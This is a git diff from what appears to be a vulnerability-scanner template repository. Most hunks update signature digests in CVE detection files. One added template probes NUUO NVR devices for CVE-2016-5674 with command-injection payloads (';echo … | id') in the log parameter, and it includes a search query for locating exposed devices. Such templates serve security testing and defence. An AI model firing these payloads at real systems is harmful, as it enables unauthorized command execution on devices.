newline at end of file +# digest: 4a0a00473045022100a996c40fae1f6d19435d135651a1168704634ae606188ed97fef12f4c8a2d3f6022016d0ce56e41a19dd65b863a46c1d4351dbf1e34b890044f16642401ec20f6b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml new file mode 100644 index 0000000000..57d085ae5e --- /dev/null +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -0,0 +1,53 @@ +id: CVE-2016-5674 + +info: + name: NUUO NVR camera `debugging_center_utils_.php` - Command Execution + author: DhiyaneshDK + severity: critical + description: | + __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter. + reference: + - http://www.kb.cert.org/vuls/id/856152 + - https://www.exploit-db.com/exploits/40200/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-5674 + cwe-id: CWE-20 + epss-score: 0.95705 + epss-percentile: 0.99378 + cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: netgear + product: readynas_surveillance + fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login" + tags: cve,cve2016,nuuo,rce + +variables: + rand: "{{to_lower(rand_text_alpha(32))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id" + - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_1, 'Debugging Center')" + - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)" + condition: and + + - type: dsl + dsl: + - "status_code_2 == 200" + - "contains(body_2, 'Debugging Center')" + - "contains(body_2, 'Windows IP')" + condition: and +# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 4fd09a239d..76c43f3f6e 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -56,4 +56,4 @@ http: - 200 - 503 condition: or -# digest: 4a0a0047304502201d3f5505147a2436c4abe3f1c341fe209327797eb297587bf15a68c5321be2fc0221009002c5c228d53f60792cc0d97f32e82d17c7d571d4d3dfb92f8ec731df341e55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index e2e083a536..bbc45b58dd 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201e9d9822db440027bab1243c0abaf3a839940e05b8e6ca9554e5b7eeb03303a2022100adad64eab124a6918eabf45c76ce03305e053367d25c6a88b5c41883d3a870fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220486802970cc24d96538b869531c7a01ec169cb576278c3edad08fb0b3171abc802206eba1c836af2a9bbfbf9b2fc2efec581afdaeb05159f11aa43a1a80f99cc78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index f08309f29f..016d2dad45 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6f6c1576613b65f36b5ee9bf6b00f9a0211ebd68bd2da0a30cff9d6ee329eee022100a0a0ce6dfeb70126c3e336f7a5a68e52c1b1a69248eccd833481c2e473da27eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 85ce8596da..b621310690 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 204 -# digest: 4a0a004730450221008743b8d70e35a768fab060065d5434cd880d660778fe069dc591324323adab5802206598f548bcdcd181bdaf02ab6e5b0ad81be8c99cf9756e4b2ad4fec0ce00c6b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index da334b7b07..cd9341263b 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100ad0fc34d0b5d96219c07d14ff6c0563ae3e9481c3e7adcaba6b746befd081195022042f34a6ff4d37acb8eeac90ee916bbf126cb7f618ebf86994f083546332b097b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index cffe2e0723..9ea899aa99 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 490a00463044022017d866002bfe98da5861e59a089a85dde898cce758c15a9718731c5408d1605102207f30a6b3a3ea9254e6e22f2bf409168ccf2a517f65a326f602f85e1e6a7e2276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066d0d9509969142bbfbcf0eb417da56845541044c0685547d194ebb62e0364e0022100eaeac8289ca457b4603e6babedbbca92bed9163d0b07be773a03a4e1c82b5b82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index c80d2c36f2..48e0a8b7bb 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -45,4 +45,4 @@ http: part: header words: - 'Mogwailabs: CHECKCHECK' -# digest: 4a0a00473045022100c4a4d191807b434fbacdc9d77a0d8d235f710d038cfe2cc4bc06b5d409da215202207b4b86edea0860c58f80337c049e7e9931fcee4e01626a0901bb6f43bde5bcf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008705283db1e276d968dd9b9bb0133072312deb7b46962195ff0237cbdbe58371022100cb9b42c506991d9e6bdc752569564cf00e79eba7dd83b19d99be99ee26ac19d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index bc28c0701e..9ba95004e8 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b989be47d8bfb034fa6e5b25782b4e87bcaca65229515bc600614d3f5567490022100dc284020a7a7e674db55449ae184ef1a5af7eb0d105bd3da76a8431c5e1f6f2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf36b71dcf43bb67c28e949553a05d8ad1e497cba64596eb43f94804d769db8102201ef0c4730c3e757ac21667bf32a685c6b09dc21deaf67677b4765cd6c6b4ab1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 67aa579107..8b2924e2e0 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -47,4 +47,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a004730450220396574a9d303f39e3b717afaacc9a7b803e6fbd71a9fc670671d1c28b349bd5e022100c0a0ee793f481dc0a5c97882c4c7b31848415a9b8d1c2bf36e281f5b0c11ea0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 5fb1799904..eeb8555f87 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -65,4 +65,4 @@ http: - "" - "" condition: and -# digest: 4a0a0047304502206816ccec7d9d6b60d504087ec00c24b7ea61eddb83a79ab87b9450e696c04349022100cbe34953d0259306111792445a4b4a95f8dc7c8b4a5dceb1bc7490dff2acd331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 3033bcf95c..27471932c3 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffb95218bb8707b53763b11882487279b42b82cf03aa5f928fcc081e1be23dcb022048b46b7112e9767d0a4a4ef6aa7dca7b10f371d74e180c353dff2e5803a2ebff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index b2b3df4452..98472b843b 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100948ec70aedf45f5d42d93f3a8f905d6afc17311a132bf43e847355c7aa7627ff022100bd8b138ce1620f6512c0d27704acf5995cab061dd3d03c6c898b24a02bbaf0cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 7b68ef55d2..58f8620d53 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -61,4 +61,4 @@ http: status: - 200 - 500 -# digest: 4a0a004730450221009815552db24d76d8c52d9ec700fe5302f2d6a04614e2e4ed663c066a1c8f28d802207effa06166add4ebebcc9b229ffffee905e561a775d9b8921b9ef12022e85816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 9007c2a627..84f8201162 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100826196c0d0e9cd60713dda70c8b917a19886bc0e4694ad636cadb6d581af878a0220528e33d0e5e765d88789cc40611b98c6c082444178491864b05447080473672f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f44ac0f4d283c3274421cf7602fe089c97a4031c30a643c870eccb4114bf13e022100929a4cbef7545c9c9dadba9a770a841a2587fad0d188ebffff79a171fcb9cc3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 85cc74f98f..6cc4cf375b 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022074794653c30c6d3470c4cf0b85cd25984bf6ada15730528c5c5ed816887bfe9102204934394f8fbf18af0d56f758dafdd43064ce19a1e8e0423f3b29cdd35712704e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 07e9ecce35..4ee30b5e16 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e925017da56bf8b449e41c4a6c9fa2bc635c71e87f6c0200cdbc76dca8d47b9b022000f002c95f19002f41619d6c23d7fd404d31670d96a43eef6b944a248e7570e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 8c8aa44ff7..208f3d300a 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dfd2cd37814b7a6dfaaab0e2c5890b26280d9dfa6b74267d023d787d261085410220388298662d7128398115012e7636b1189983add3ae5e638ef26a57d0f2e08359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index eb3df317d5..ff6836350e 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b9a63811f0cd0b53a30ddc0f315604f0a150d100126e214c6877ea5af0338974022016750fc20517e9bb5cd929abae7efefcc8ded3ed8f8f258672aafafd7645c867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 02e7735924..ad974d371a 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -51,4 +51,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4b0a00483046022100fe8f839bbe06b5449c793c06f29f5ae45bc7230094aecddc1347dd016495da5e0221009fe869463a5cd101c9cc2454197353421af9acbd2a73d27aa24fa4eaf4540638:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 236d08991a..651e869029 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -63,4 +63,4 @@ http: status: - 201 - 409 -# digest: 4b0a00483046022100b2e7cc90f0a4448db96351b76920cbf916fb83ec275dd0b02927fdc02369f57a022100969019a97e8248ac043d86a0355a25a15e14cf638626d0e2acb55f84cfcff59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 35e7473de6..38169b306e 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f2ae8a67e5369b28740934c6375bcd679521e277a095be5402eaba0a1b2b4220220704834928037e2ff9eb04b41028cd6c2350d2b4af1f808fce30ab7b5e9154eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 39f1c881ea..199cc5bec1 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022007301f3955fb4025ef78cd58fda81f8c45599bb67973c15269eb22b5cf4d8d6b02207c5f0183f387c479cc37b934833b88c8e1b5bbc91d7a58254b9641a209170047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index a9b1706d2e..14d594b33d 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 490a00463044022069df390153cc25f9676f2747e46180478272ce6e5deaf7a5fec18c0fba82cf22022046ccfa08649c4c45031f01fb354d48fc7c3d514ab68b16c98da7bd8fc9901e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index f63ba09605..a3aac17359 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -47,4 +47,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100dbcb4788e435eecd0d426205954e166d207ff6f06663a33d36ea5f43c2ca6ad902202f08c5e12a24659a7572e09f52b5c22511df72254ed4a69e3d4d0b1fa1710461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 707efd7448..9004855cb0 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -41,4 +41,4 @@ http: - type: word words: - 'Unknown command: ' -# digest: 4a0a00473045022100b1386f24d07831d5a5ff575874e905fa388203abe37dee3e1838038223ed8016022046b78214fa0bc8d56fd09f7505310980b044c0c9da908d0b7dae18a5ae24e02c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 04ce36933b..7473b9177c 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022019ec11663bf42cd8e94c7c8b2c2461e3c57e50c182d816434555b9cf490ca0f402204453fd5a76bf5cf9736bfa1f088c706328fe212b00a25cf3ada4f4df079308e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5d77978e4bf1b0b23b2a87fa7c05a6926a25d777143c35f1d08683b86f51284022100abd7302d98294c6c4265536959cb51aa5a70676c2d4de2f78ff37adc77d983e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index b45d6f398a..7b6d9d5a2a 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071cb00cad9a965bd95a9dc1be22036e837bb5001039107c52962d3135401c3a8022100c3dee6d9c9a519cfdd53effaab8664989afbd871105aa433a8e993d5a0616d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 0de260dce1..95bebe1838 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220783a7b3add8e539497c85c4308309249b6f402242c517dad4d0b3155ac3fae1e022100b6b6c26fff01471a177c6727ec782697a87e977797897f3fc5cf48571957090b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index c1662a4f35..27c7657e3b 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca54fb42cffe1ac7badf861ccd91ea32643a4b0f1360983ded4f7349b028721002206550860322d1c222d0fbe9597f95dc75b6243b9e9667f0fcb412e39ca6891cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a541924b65a67b00842f8a25418a80364b6d61f929707787057785e26f98d3b002205403d069324b4a48da8c6cba4b38fc4d1c04a8a1510526608e59a4bcab70e57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 7354155c41..9343b3518d 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0295f32ed904bc1b7aa10a0794c4a4bcc1face9df3f60ab99daf6f80fefa3de022100988de31fad0262697f816f7b9206631178e3c0847588162a1aea3659a39e1e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d107ca7ab9a4118c075495bb03869c6020f6273dc1955b4f950085815b71eea7022100fcfe2a0359d8d36c11ea050a49b4556308b0d3b182a5014cacef805e7d7cf633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index c8b08c2475..4bfef0fdf6 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -117,4 +117,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220121da3e7b07d35d6cc36396744f512a33ad3dc1ba36b7f99975e68d99f7950e50220073fc66cac1e0ba2aba9a53106e851591967dd64abdeb8b4d199284261e0417d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 9de36a3609..cd12b0eaf6 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dccd2294d8b4b57ee959cdebd9c8b38ea50aab4f9bb17def9544d89c71e1e0e102204c6ab00c42f95285b0ba354acdda4cdfea06f25bda8505f52d384461327abf4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba551e3088d97f8d462ef4b105c0dc9c4bc6cef870e1e5898d660c13360a9c79022068cf574ec431237b66a83d1398a8b348cbcf96e48a36b441e77089f600452268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index a15ea68987..bf8b0e1e71 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -51,4 +51,4 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 4a0a00473045022003bed6413f0e860587ba702c8b16182e7c5df656937cb3522813cd08d6c14ec3022100d62696adcd775f3fb1a3ecddf3e150feb6cd5cb4533ff1e4c5f5834430739b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index fe8d80f715..3f5b40e325 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 